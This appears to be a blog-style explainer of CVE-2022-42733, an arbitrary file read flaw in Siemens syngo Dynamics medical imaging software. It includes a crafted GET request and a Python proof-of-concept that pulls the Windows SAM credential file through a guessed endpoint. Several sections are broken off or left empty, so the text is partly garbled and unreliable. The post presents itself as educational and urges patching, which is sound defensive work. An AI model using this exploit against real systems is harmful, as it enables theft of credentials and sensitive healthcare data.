CVE-2022-42733 is a security flaw found in all versions of syngo Dynamics before VA40G HF01. This vulnerability can allow attackers to read files from any location on the system that the web server’s application pool account can access. The problem comes from a web service feature which lacks proper restrictions on which files it will let users download—all it takes is knowing the service’s endpoint and making some crafted requests.

In this post, I’ll break down what the vulnerability is, how it works, and provide a demonstration code snippet. This is meant for educational and defensive purposes only: patch your systems if you haven’t!

- Siemens advisory: SSA-884388
- MITRE CVE entry
- NVD entry

Understanding the Problem

syngo Dynamics is widely used in healthcare for managing images and reporting—so it’s serious when a flaw affects patient privacy or system security. In this case, the application server hosts a web service with an operation that lets a user fetch files. The core problem is the lack of filters or controls on which files you can ask for: if you can guess the path, you can get the file, as long as the server’s application pool account can read it.

In simple terms:

Suppose the web service has an API call like this

https://syngodynamics.example.com/filefetch?path=C:\Users\app\report.pdf

If you supply ANY path, the service goes ahead and lets you download the file—no check to see if you should be allowed to.

To exploit this vulnerability, an attacker needs

- Network access to the syngo Dynamics web server (which could be internal, but healthcare networks have many users and sometimes weak segmentation)

Knowledge (or guesses) about file paths on the Windows server

The attacker crafts a request to the relevant web service operation, specifying a file path—let’s say, for the Windows SAM file, or for sensitive syngo Dynamics configuration:

GET /FileReadService?path=C:\Windows\System32\config\SAM HTTP/1.1
Host: vuln-syngo-dynamics.local

If the web service runs with enough privileges, the attacker gets a copy of the requested file’s contents.

Exploit Example: Simple PoC in Python

Below is a proof-of-concept Python snippet showing how this would likely be exploited (exact endpoint and parameter may vary):

import requests

# Target server and file to read
base_url = 'https://syngodynamics.example.com';
endpoint = '/FileReadService'
file_path = r'C:\Windows\System32\config\SAM'  # Vulnerable: Read sensitive file

# Build the URL
url = f"{base_url}{endpoint}?path={file_path}"

# If authentication is required, include auth details here
response = requests.get(url, verify=False)

if response.status_code == 200:
    # Print out the contents (could be binary)
    print(f"[*] Successfully read {file_path}!")
    print(response.content)
else:
    print(f"[!] Failed to read file. Server responded with: {response.status_code}")

> *NOTE: This script is a demonstration only. Never use it against computers you do not own or have permission to test.*

Other users’ private data on the system

If the website runs under a high-privilege account (like a local administrator), the risk is extreme. But even low-privilege accounts can often access sensitive application data or configurations.

Mitigation and Recommendations

Siemens provides a patch in syngo Dynamics VA40G HF01. If you’re running an older version:

Key Takeaways

- CVE-2022-42733 allows attackers to download arbitrary files from vulnerable syngo Dynamics installations

Patching is critical, especially in healthcare environments handling sensitive data

If you are running syngo Dynamics, check your versions and update today. Control internal network access to your medical imaging servers, and review accounts and permissions for all web server application pools.

Further Reading

- Siemens Security Advisory – SSA-884388
- CVE-2022-42733 at NVD
- CWE-862: Missing Authorization — the class of bug involved

Timeline

Published on: 11/17/2022 17:15:00 UTC
Last modified on: 11/21/2022 19:57:00 UTC